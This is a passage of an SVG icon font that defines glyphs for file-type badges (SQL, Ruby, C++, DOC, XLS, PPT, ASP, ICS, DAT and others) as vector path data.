<glyph unicode="&#xec77;" glyph-name="file-sql2" d="M565.621 323.752c-6.799-2.431-14.132-3.752-21.777-3.752h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-16.169-5.853-30.82-15.533-42.029l24.102-24.102-22.627-22.627-28.321 28.321zM537.373 352h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM320.156 544h31.688c35.551 0 64.156-28.654 64.156-64h-32c0 17.498-14.312 32-31.967 32h-32.067c-17.801 0-31.967-14.327-31.967-32 0-17.796 14.461-32 32.3-32h31.7c35.593 0 64-28.654 64-64 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.669-64.156 64.035v0.184h32v-0.362c0-17.256 14.312-31.857 31.967-31.857h32.067c17.801 0 31.967 14.327 31.967 32 0 17.796-14.461 32-32.3 32h-31.7c-35.593 0-64 28.654-64 64 0 35.593 28.724 64 64.156 64zM800 352v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xec78;" glyph-name="file-rb" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM409.6 416h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM384 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM544 424v120h95.844c35.551 0 64.156-28.654 64.156-64 0-19.21-8.367-36.327-21.641-48.015 13.274-11.727 21.641-28.878 21.641-47.985 0-35.593-28.724-64-64.156-64h-95.844v104zM576 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec79;" glyph-name="file-rb2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM409.6 416h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM384 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM544 424v120h95.844c35.551 0 64.156-28.654 64.156-64 0-19.21-8.367-36.327-21.641-48.015 13.274-11.727 21.641-28.878 21.641-47.985 0-35.593-28.724-64-64.156-64h-95.844v104zM576 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM576 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec7a;" glyph-name="file-cpp" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM416 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec7b;" glyph-name="file-cpp2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM416 384l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec7c;" glyph-name="file-tga" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 512v-192h32v192h64v32h-160v-32h64zM576 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM768 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM703.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xec7d;" glyph-name="file-tga2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320 512v-192h32v192h64v32h-160v-32h64zM576 416v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM768 416v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM703.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xec7e;" glyph-name="file-dxf" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM512 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM256 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM672 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xec7f;" glyph-name="file-dxf2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM512 432l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112zM256 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM672 448v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xec80;" glyph-name="file-doc" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM256 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM512.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM511.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM800 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xec81;" glyph-name="file-doc2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM256 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM512.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM511.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM800 384l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64z" />
<glyph unicode="&#xec82;" glyph-name="file-odt" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM448 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xec83;" glyph-name="file-odt2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM319.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM448 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM480 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xec84;" glyph-name="file-xls" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM608 352v-32h-160v224h32v-192h128zM704.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec85;" glyph-name="file-xls2" d="M256.219 640c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h543.562c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-543.562zM320 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM608 352v-32h-160v224h32v-192h128zM704.156 544h31.688c35.551 0 64.156-28.654 64.156-64h-32c0 17.498-14.312 32-31.967 32h-32.067c-17.801 0-31.967-14.327-31.967-32 0-17.796 14.461-32 32.3-32h31.7c35.593 0 64-28.654 64-64 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.669-64.156 64.035v0.184h32v-0.362c0-17.256 14.312-31.857 31.967-31.857h32.067c17.801 0 31.967 14.327 31.967 32 0 17.796-14.461 32-32.3 32h-31.7c-35.593 0-64 28.654-64 64 0 35.593 28.724 64 64.156 64z" />
<glyph unicode="&#xec86;" glyph-name="file-docx" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM160.235 608c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM160 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM192 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM416.156 544h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM415.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM704 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM800 432l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xec87;" glyph-name="file-docx2" d="M159.817 640h736.366c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-736.366c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961zM160 544v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM192 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM416.156 544c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM415.967 512c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM704 384l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM800 432l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112z" />
<glyph unicode="&#xec88;" glyph-name="file-ppt" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM448 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM256 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xec89;" glyph-name="file-ppt2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM448 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM480 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM256 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM288 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704 512v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xec8a;" glyph-name="file-asp" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM384 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM512.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM640 480v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec8b;" glyph-name="file-asp2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM384 416v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM319.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM512.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM640 480v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM672 512v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xec8c;" glyph-name="file-ics" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM320 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM576 384c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM672.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec8d;" glyph-name="file-ics2" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM320 512v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM576 384l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM672.156 544c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xec8e;" glyph-name="file-dat" d="M256.219 640h543.562c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-543.562c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961zM255.826 608c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM576 416h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM511.967 512c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM256 544h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM288 512v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM704 512v-192h32v192h64v32h-160v-32h64z" />
